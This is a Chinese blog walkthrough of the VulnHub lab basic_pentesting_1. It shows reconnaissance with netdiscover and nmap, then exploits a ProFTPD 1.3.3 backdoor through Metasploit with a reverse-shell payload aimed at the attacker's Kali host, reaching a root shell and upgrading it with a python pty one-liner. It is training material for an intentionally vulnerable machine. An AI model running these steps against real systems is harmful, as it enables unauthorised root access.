靶场练习第五天~vulnhub靶场之basic_pentesting_1

一、信息收集

1.主机发现

靶机下载链接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取码: i8hv

(1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式

具体操作如下,查看一下kali的ip

然后使用命令sudo netdiscover,发现了靶机的ip

2.端口扫描,服务识别

(1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106

二、后渗透

1.根据服务版本搜索相关漏洞

这里用到msfconsole,关于msfconsole介绍:msfconsole又叫MSF终端、The Mctasploit Framework,是目前Metasploit框架最流行的用户接口。

具体用法如下:

(1)在kali输入 msfconsole命令,进入到该框架内

(2)先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)

(3)由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;然后查看要设置的参数(show options),使用方法如下:

(4)设置一下RHOSTS(目标的地址),输入set RHOSTS 192.168.101.106

(5)设置payload,输入set payload cmd/unix/reverse(反向连接)

(6)查看backdoor需要的参数:show options,发现还需要设置一个监听的地址

(7)设置LHOST:set LHOST 192.168.101.10(kali的ip)

(8)参数设置完成后,输入run,执行攻击,成功进入getshell

(9)查看当前用户拥有的权限:sudo -l,发现当前用户已经是root

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值